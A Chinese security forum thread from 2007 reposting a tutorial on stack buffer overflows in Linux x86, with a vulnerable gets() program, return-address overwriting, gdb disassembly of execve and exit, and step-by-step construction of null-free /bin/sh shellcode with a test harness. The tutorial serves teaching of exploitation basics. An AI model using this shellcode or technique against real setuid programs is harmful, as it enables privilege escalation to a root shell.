飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 1420|回复: 5

[分享] 堆栈溢出技术从入门到高深(一)

[复制链接]
  • TA的每日心情
    开心
    2022-4-18 15:36
  • 签到天数: 207 天

    [LV.7]常住居民III

    发表于 2007-12-18 19:05:40 | 显示全部楼层 |阅读模式
    首先你应该了解intel汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配方面
    的基础知识,有关这方面的计算机书籍很多,我将只是简单阐述原理,着重在应用。其次,
    你应该了解linux,本讲中我们的例子将在linux上开发。  

    1:首先复习一下基础知识。  

    从物理上讲,堆栈是就是一段连续分配的内存空间。在一个程序中,会声明各种变量。静态
    全局变量是位于数据段并且在程序开始运行的时候被加载。而程序的动态的局部变量则分配
    在堆栈里面。  

    从操作上来讲,堆栈是一个先入后出的队列。他的生长方向与内存的生长方向正好相反。我
    们规定内存的生长方向为向上,则栈的生长方向为向下。压栈的操作push=ESP-4,出栈的
    操作是pop=ESP+4.换句话说,堆栈中老的值,其内存地址,反而比新的值要大。  
    请牢牢记住这一点,因为这是堆栈溢出的基本理论依据。  

    在一次函数调用中,堆栈中将被依次压入:参数,返回地址,EBP。如果函数有局部变量,
    接下来,就在堆栈中开辟相应的空间以构造变量。函数执行结束,这些局部变量的内容将被
    丢失。但是不被清除。在函数返回的时候,弹出EBP,恢复堆栈到函数调用的地址,弹出返回
    地址到EIP以继续执行程序。  

    在C语言程序中,参数的压栈顺序是反向的。比如func(a,b,c)。在参数入栈的时候,是:
    先压c,再压b,最后a.在取参数的时候,由于栈的先入后出,先取栈顶的a,再取b,最后取c。  
    (PS:如果你看不懂上面这段概述,请你去看以看关于堆栈的书籍,一般的汇编语言书籍都
    会详细的讨论堆栈,必须弄懂它,你才能进行下面的学习)  

    2:好了,继续,让我们来看一看什么是堆栈溢出。  

    2.1:运行时的堆栈分配  

    堆栈溢出就是不顾堆栈中分配的局部数据块大小,向该数据块写入了过多的数据,导致数据
    越界。结果覆盖了老的堆栈数据。  

    比如有下面一段程序:  
    程序一:  
    #include <stdio.h>  
    int main ( )  
    {  
    char name[8];  
    printf("Please type your name: ");  
    gets(name);  
    printf("Hello, %s!", name);  
    return 0;  
    }  

    编译并且执行,我们输入ipxodi,就会输出Hello,ipxodi!。程序运行中,堆栈是怎么操作的呢?  

    在main函数开始运行的时候,堆栈里面将被依次放入返回地址,EBP。  

    我们用gcc -S 来获得汇编语言输出,可以看到main函数的开头部分对应如下语句:  

    pushl %ebp  
    movl %esp,%ebp  
    subl $8,%esp  

    首先他把EBP保存下来,,然后EBP等于现在的ESP,这样EBP就可以用来访问本函数的
    局部变量。之后ESP减8,就是堆栈向上增长8个字节,用来存放name[]数组。现在堆栈
    的布局如下:  

    内存底部 内存顶部  
    name EBP ret  
    <------ [ ][ ][ ]  
    ^&name  
    栈顶部 堆栈底部  

    执行完gets(name)之后,堆栈如下:  

    内存底部 内存顶部  
    name EBP ret  
    <------ [ipxodi\0 ][ ][ ]  
    ^&name  
    栈顶部 堆栈底部  

    最后,main返回,弹出ret里的地址,赋值给EIP,CPU继续执行EIP所指向的指令。  


    2.2:堆栈溢出  

    好,看起来一切顺利。我们再执行一次,输入ipxodiAAAAAAAAAAAAAAA,执行完
    gets(name)之后,堆栈如下:  

    内存底部 内存顶部  
    name EBP ret  
    <------ [ipxodiAA][AAAA][AAAA].......  
    ^&name  
    栈顶部 堆栈底部  

    由于我们输入的name字符串太长,name数组容纳不下,只好向内存顶部继续写
    ‘A’。由于堆栈的生长方向与内存的生长方向相反,这些‘A’覆盖了堆栈的
    老的元素。 如图  
    我们可以发现,EBP,ret都已经被‘A’覆盖了。在main返回的时候,就会把
    ‘AAAA’的ASCII码:0x41414141作为返回地址,CPU会试图执行0x41414141处
    的指令,结果出现错误。这就是一次堆栈溢出。  

    3:如何利用堆栈溢出  

    我们已经制造了一次堆栈溢出。其原理可以概括为:由于字符串处理函数
    (gets,strcpy等等)没有对数组越界加以监视和限制,我们利用字符数组写
    越界,覆盖堆栈中的老元素的值,就可以修改返回地址。  

    在上面的例子中,这导致CPU去访问一个不存在的指令,结果出错。  

    事实上,当堆栈溢出的时候,我们已经完全的控制了这个程序下一步的动作。
    如果我们用一个实际存在指令地址来覆盖这个返回地址,CPU就会转而执行我
    们的指令。  

    在UINX系统中,我们的指令可以执行一个shell,这个shell将获得和被我们堆
    栈溢出的程序相同的权限。如果这个程序是setuid的,那么我们就可以获得
    root shell。  


    下一讲将叙述如何书写一个shell code。  


    ------------------------------------------------------------

    如何书写一个shell code  

    一:shellcode基本算法分析  

    在程序中,执行一个shell的程序是这样写的:  
    shellcode.c  
    ------------------------------------------------------------------------  
    -----  
    #include <stdio.h>  

    void main() {  
    char *name[2];  

    name[0] = "/bin/sh"  
    name[1] = NULL;  
    execve(name[0], name, NULL);  
    }  
    ------------------------------------------------------------------------  
    ------  
    execve函数将执行一个程序。他需要程序的名字地址作为第一个参数。一个内容为
    该程序的argv(argv[n-1]=0)的指针数组作为第二个参数,以及(char*) 0作为
    第三个参数。  

    我们来看以看execve的汇编代码:  
    [nkl10]$Content$nbsp;gcc -o shellcode -static shellcode.c  
    [nkl10]$Content$nbsp;gdb shellcode  
    (gdb) disassemble __execve  
    Dump of assembler code for function __execve:  
    0x80002bc <__execve>: pushl %ebp ;  
    0x80002bd <__execve+1>: movl %esp,%ebp  
    ;上面是函数头。  
    0x80002bf <__execve+3>: pushl %ebx  
    ;保存ebx  
    0x80002c0 <__execve+4>: movl $0xb,%eax  
    ;eax=0xb,eax指明第几号系统调用。  
    0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx  
    ;ebp+8是第一个参数"/bin/sh\0"  
    0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx  
    ;ebp+12是第二个参数name数组的地址  
    0x80002cb <__execve+15>: movl 0x10(%ebp),%edx  
    ;ebp+16是第三个参数空指针的地址。  
    ;name[2-1]内容为NULL,用来存放返回值。  
    0x80002ce <__execve+18>: int $0x80  
    ;执行0xb号系统调用(execve)  
    0x80002d0 <__execve+20>: movl %eax,%edx  
    ;下面是返回值的处理就没有用了。  
    0x80002d2 <__execve+22>: testl %edx,%edx  
    0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>  
    0x80002d6 <__execve+26>: negl %edx  
    0x80002d8 <__execve+28>: pushl %edx  
    0x80002d9 <__execve+29>: call 0x8001a34  
    <__normal_errno_location>  
    0x80002de <__execve+34>: popl %edx  
    0x80002df <__execve+35>: movl %edx,(%eax)  
    0x80002e1 <__execve+37>: movl $0xffffffff,%eax  
    0x80002e6 <__execve+42>: popl %ebx  
    0x80002e7 <__execve+43>: movl %ebp,%esp  
    0x80002e9 <__execve+45>: popl %ebp  
    0x80002ea <__execve+46>: ret  
    0x80002eb <__execve+47>: nop  
    End of assembler dump.  

    经过以上的分析,可以得到如下的精简指令算法:  
    movl $execve的系统调用号,%eax  
    movl "bin/sh\0"的地址,%ebx  
    movl name数组的地址,%ecx  
    movl name[n-1]的地址,%edx  
    int $0x80 ;执行系统调用(execve)  

    当execve执行成功后,程序shellcode就会退出,/bin/sh将作为子进程继续执行。
    可是,如果我们的execve执行失败,(比如没有/bin/sh这个文件),CPU就会继续
    执行后续的指令,结果不知道跑到哪里去了。所以必须再执行一个exit()系统调
    用,结束shellcode.c的执行。  

    我们来看以看exit(0)的汇编代码:  
    (gdb) disassemble _exit  
    Dump of assembler code for function _exit:  
    0x800034c <_exit>: pushl %ebp  
    0x800034d <_exit+1>: movl %esp,%ebp  
    0x800034f <_exit+3>: pushl %ebx  
    0x8000350 <_exit+4>: movl $0x1,%eax ;1号系统调用  
    0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx ;ebx为参数0  
    0x8000358 <_exit+12>: int $0x80 ;引发系统调用  
    0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx  
    0x800035d <_exit+17>: movl %ebp,%esp  
    0x800035f <_exit+19>: popl %ebp  
    0x8000360 <_exit+20>: ret  
    0x8000361 <_exit+21>: nop  
    0x8000362 <_exit+22>: nop  
    0x8000363 <_exit+23>: nop  
    End of assembler dump.  

    看来exit(0)〕的汇编代码更加简单:  
    movl $0x1,%eax ;1号系统调用  
    movl 0,%ebx ;ebx为exit的参数0  
    int $0x80 ;引发系统调用  

    那么总结一下,合成的汇编代码为:  
    movl $execve的系统调用号,%eax  
    movl "bin/sh\0"的地址,%ebx  
    movl name数组的地址,%ecx  
    movl name[n-1]的地址,%edx  
    int $0x80 ;执行系统调用(execve)  
    movl $0x1,%eax ;1号系统调用  
    movl 0,%ebx ;ebx为exit的参数0  
    int $0x80 ;执行系统调用(exit)

    [ 本帖最后由 zjid520 于 2007-12-18 19:09 编辑 ]
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2022-4-18 15:36
  • 签到天数: 207 天

    [LV.7]常住居民III

     楼主| 发表于 2007-12-18 19:08:22 | 显示全部楼层
    二:实现一个shellcode  

    好,我们来实现这个算法。首先我们必须有一个字符串“/bin/sh”,还得有一个name
    数组。我们可以构造它们出来,可是,在shellcode中如何知道它们的地址呢?每一次
    程序都是动态加载,字符串和name数组的地址都不是固定的。  

    通过JMP和call的结合,黑客们巧妙的解决了这个问题。  
    ------------------------------------------------------------------------  
    ------  
    jmp call的偏移地址 # 2 bytes  
    popl %esi # 1 byte //popl出来的是string的地址。  
    movl %esi,array-offset(%esi) # 3 bytes //在string+8处构造 name数组,  

    //name[0]放 string的地址  

    movb $0x0,nullbyteoffset(%esi)# 4 bytes //string+7处放0作为string的结  
    尾。  
    movl $0x0,null-offset(%esi) # 7 bytes //name[1]放0。  
    movl $0xb,%eax # 5 bytes //eax=0xb是execve的syscall代码  
    。  
    movl %esi,%ebx # 2 bytes //ebx=string的地址  
    leal array-offset,(%esi),%ecx # 3 bytes //ecx=name数组的开始地址  
    leal null-offset(%esi),%edx # 3 bytes //edx=name〔1]的地址  
    int $0x80 # 2 bytes //int 0x80是sys call  
    movl $0x1, %eax # 5 bytes //eax=0x1是exit的syscall代码  
    movl $0x0, %ebx # 5 bytes //ebx=0是exit的返回值  
    int $0x80 # 2 bytes //int 0x80是sys call  
    call popl 的偏移地址 # 5 bytes //这里放call,string 的地址就会  
    作  
    //为返回地址压栈。  
    /bin/sh 字符串  
    ------------------------------------------------------------------------  
    ------  
    首先使用JMP相对地址来跳转到call,执行完call指令,字符串/bin/sh的地址将作为
    call的返回地址压入堆栈。现在来到popl esi,把刚刚压入栈中的字符串地址取出来,
    就获得了字符串的真实地址。然后,在字符串的第8个字节赋0,作为串的结尾。后面
    8个字节,构造name数组(两个整数,八个字节)。  

    我们可以写shellcode了。先写出汇编源程序。  
    shellcodeasm.c  
    ------------------------------------------------------------------------  
    ------  
    void main() {  
    __asm__("  
    jmp 0x2a # 3 bytes  
    popl %esi # 1 byte  
    movl %esi,0x8(%esi) # 3 bytes  
    movb $0x0,0x7(%esi) # 4 bytes  
    movl $0x0,0xc(%esi) # 7 bytes  
    movl $0xb,%eax # 5 bytes  
    movl %esi,%ebx # 2 bytes  
    leal 0x8(%esi),%ecx # 3 bytes  
    leal 0xc(%esi),%edx # 3 bytes  
    int $0x80 # 2 bytes  
    movl $0x1, %eax # 5 bytes  
    movl $0x0, %ebx # 5 bytes  
    int $0x80 # 2 bytes  
    call -0x2f # 5 bytes  
    .string \"/bin/sh\" # 8 bytes  
    ");  
    }  
    ------------------------------------------------------------------------  
    ------  
    编译后,用gdb的b/bx 〔地址〕命令可以得到十六进制的表示。  
    下面,写出测试程序如下:(注意,这个test程序是测试shellcode的基本程序)  

    test.c  
    ------------------------------------------------------------------------  
    ------  

    char shellcode[] =  
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"  
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"  
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"  
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"  

    void main() {  
    int *ret;  

    ret = (int *)&ret + 2; //ret 等于main()的返回地址  
    //(+2是因为:有pushl ebp ,否则加1就可以了。)  

    (*ret) = (int)shellcode; //修改main()的返回地址为shellcode的开始地  
    址。  

    }  

    ------------------------------------------------------------------------  
    ------  
    ------------------------------------------------------------------------  
    ------  
    [nkl10]$Content$nbsp;gcc -o test test.c  
    [nkl10]$Content$nbsp;./test  
    $Content$nbsp;exit  
    [nkl10]$Content$nbsp;
    ------------------------------------------------------------------------  
    ------  
    我们通过一个shellcode数组来存放shellcode,当我们把程序(test.c)的返回地址
    ret设置成shellcode数组的开始地址时,程序在返回的时候就会去执行我们的shellcode,
    从而我们得到了一个shell。  

    运行结果,得到了bsh的提示符$,表明成功的开了一个shell。  

    这里有必要解释的是,我们把shellcode作为一个全局变量开在了数据段而不是作为
    一段代码。是因为在操作系统中,程序代码段的内容是具有只读属性的。不能修改。
    而我们的代码中movl %esi,0x8(%esi)等语句都修改了代码的一部分,所以不能放在
    代码段。  

    这个shellcode可以了吗?很遗憾,还差了一点。大家回想一下,在堆栈溢出中,关
    键在于字符串数组的写越界。但是,gets,strcpy等字符串函数在处理字符串的时候,
    以"\0"  
    为字符串结尾。遇\0就结束了写操作。而我们的shellcode串中有大量的\0字符。因此,  
    对于gets(name)来说,上面的shellcode是不可行的。我们的shellcode是不能有\0字符  
    出现的。  

    因此,有些指令需要修改一下:  
    旧的指令 新的指令  
    --------------------------------------------------------  
    movb $0x0,0x7(%esi) xorl %eax,%eax  
    molv $0x0,0xc(%esi) movb %eax,0x7(%esi)  
    movl %eax,0xc(%esi)  
    --------------------------------------------------------  
    movl $0xb,%eax movb $0xb,%al  
    --------------------------------------------------------  
    movl $0x1, %eax xorl %ebx,%ebx  
    movl $0x0, %ebx movl %ebx,%eax  
    inc %eax  
    --------------------------------------------------------  

    最后的shellcode为:  
    ------------------------------------------------------------------------  
    ----  
    char shellcode[]=  
    00 "\xeb\x1f" /* jmp 0x1f */  
    02 "\x5e" /* popl %esi */  
    03 "\x89\x76\x08" /* movl %esi,0x8(%esi) */  
    06 "\x31\xc0" /* xorl %eax,%eax */  
    08 "\x88\x46\x07" /* movb %eax,0x7(%esi) */  
    0b "\x89\x46\x0c" /* movl %eax,0xc(%esi) */  
    0e "\xb0\x0b" /* movb $0xb,%al */  
    10 "\x89\xf3" /* movl %esi,%ebx */  
    12 "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */  
    15 "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */  
    18 "\xcd\x80" /* int $0x80 */  
    1a "\x31\xdb" /* xorl %ebx,%ebx */  
    1c "\x89\xd8" /* movl %ebx,%eax */  
    1e "\x40" /* inc %eax */  
    1f "\xcd\x80" /* int $0x80 */  
    21 "\xe8\xdc\xff\xff\xff" /* call -0x24 */  
    26 "/bin/sh" /* .string \"/bin/sh\" */
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2008-6-23 20:26:43 | 显示全部楼层
    学习了呵呵!~~~~~~~
      希望下篇同样精彩
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2008-6-29 09:41:17 | 显示全部楼层
    长见识了,谢谢!期待下文
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2008-7-10 12:32:54 | 显示全部楼层
    长见识了,谢谢!期待下文
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2024-1-2 10:43
  • 签到天数: 33 天

    [LV.5]常住居民I

    发表于 2016-9-20 17:01:46 | 显示全部楼层
    此贴有意思~
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表